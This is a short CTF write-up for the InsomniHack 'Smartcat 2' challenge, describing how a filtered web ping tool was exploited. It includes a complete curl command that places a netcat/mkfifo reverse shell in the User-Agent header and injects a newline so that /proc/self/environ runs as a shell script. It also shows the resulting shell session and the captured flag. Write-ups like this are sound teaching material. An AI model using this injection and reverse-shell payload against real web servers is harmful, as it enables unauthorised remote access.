Coffee Difficulty Rating:

Challenge Description

Exploit the web based ping command tool and capture the flag.

smartcat2 CTF

InsomniHack Smartcat 2

Due to filtering it was impossible to enter any white space in commands, making it far more difficult than the smartcat1 challenge. Initially I tried and failed to use a /dev/tcp/ip/port reverse shell.

proc/self/environ Injection

The environment variable HTTP_USER_AGENT= which contains the contents of the User-Agent: field, had no filtering allowing for easy injection of a reverse shell.

Using command injection it was possible to execute /proc/self/env and successfully execute a reverse shell.

Reverse Shell

Putting it all together using curl:

curl '' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

The flag was not readable by www-data, the binary readflag was required to read the contents of the flag.

A couple of lines needed typing in to “confirm” you had an interactive shell, after entering the flag was displayed:

www-data@smartcat:/home/smartcat$ ./readflag
Give me a...
Give me a...
... flag!
... flag!
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
        |`._`n'_.'|  hjw

INS{shells_are _way_better_than_cats}


Thanks for the challenge :)